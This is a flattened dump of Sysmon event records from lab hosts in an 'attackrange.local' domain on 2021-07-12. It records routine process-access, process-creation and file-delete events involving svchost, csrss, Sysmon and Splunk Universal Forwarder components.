08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:27.618{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.604{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.087{0C1E0330-F69A-60EB-AF79-00000000D001}14362356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.462{0C1E0330-F69C-60EB-B179-00000000D001}23081504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:28.306{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.291{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84115B292F280DCD7B4FE7F41EAFAA20,SHA256=681B66CCFA99C2463AB4ED2144C9DFC45879EF193BAD6B43D36B233E8C0CD457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:28.035{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E630C9332D4AEF9F53C352B320590BB,SHA256=FB4872EA8B1EEAD0704FF886B23703F66B5958F70E65CF4528FDC9A1B054230B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:29.306{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A15D38635EF4328B5ECEA20731DB1F96,SHA256=D77F511BE633FB6CE83C87A724746928A937D3491951A95D6525FF3871F138BD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:29.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20B62C9508C1A42BB77FE64AAF990FE,SHA256=B96AF6770B087B6E6BA93C474DD875C7B76594EC3871C0167764B8887479AD60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:29.036{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=231BAEA215D86A3A7109660F83C5923C,SHA256=A5F5E46AF183E1617359088512A892154E6F826C5CB839F026311FFE873D91D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 